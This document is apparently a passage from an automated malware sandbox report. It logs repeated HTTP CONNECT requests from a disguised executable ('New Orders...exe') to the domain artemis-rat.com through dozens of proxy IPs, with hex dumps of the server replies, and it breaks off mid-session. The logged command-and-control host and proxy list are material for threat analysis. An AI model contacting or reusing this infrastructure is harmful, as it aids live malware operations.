                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        707192.168.2.952198162.214.121.1189897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.508420944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.132522106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.824115038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.046533108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.336117029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.648487091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.945311069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.538975000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:05.742124081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        708192.168.2.951980103.118.44.13680807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.508583069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        709192.168.2.952045184.185.105.10544817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.509118080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.703376055 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        710192.168.2.9518555.10.249.15910807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.509322882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.476406097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        711192.168.2.95203627.0.234.20610807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.511925936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        712192.168.2.951928109.194.22.6180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.521348953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        713192.168.2.952237104.25.244.70807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.525574923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.680166006 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        714192.168.2.95214572.10.164.17826757672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.532582998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        715192.168.2.952190186.96.15.7080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.532852888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.070100069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.735198021 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        716192.168.2.952154192.111.139.16241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.543813944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        717192.168.2.95200680.241.44.3456787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.547427893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        718192.168.2.95197459.98.4.7080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.548415899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.476408958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.773544073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.900513887 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        719192.168.2.952291166.62.88.163492637672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.569684982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.132607937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.824053049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.945471048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.222310066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.417562008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        720192.168.2.94983093.171.243.25310807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.573683977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        721192.168.2.952347104.20.233.70807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.575275898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.729533911 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        722192.168.2.952111211.43.214.205807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.575498104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.185369968 CET831INHTTP/1.1 400 Bad Request
                                                                                        Date: Mon, 11 Mar 2024 15:16:49 GMT
                                                                                        Server: cloudflare
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 655
                                                                                        CF-RAY: -
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        723192.168.2.9525025.161.108.724437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.578309059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        724192.168.2.9525105.161.108.724437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.580024004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        725192.168.2.9525165.161.108.724437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.581562996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        726192.168.2.952355172.67.25.204807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.582489967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.736774921 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        727192.168.2.9525215.161.108.724437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.582746029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
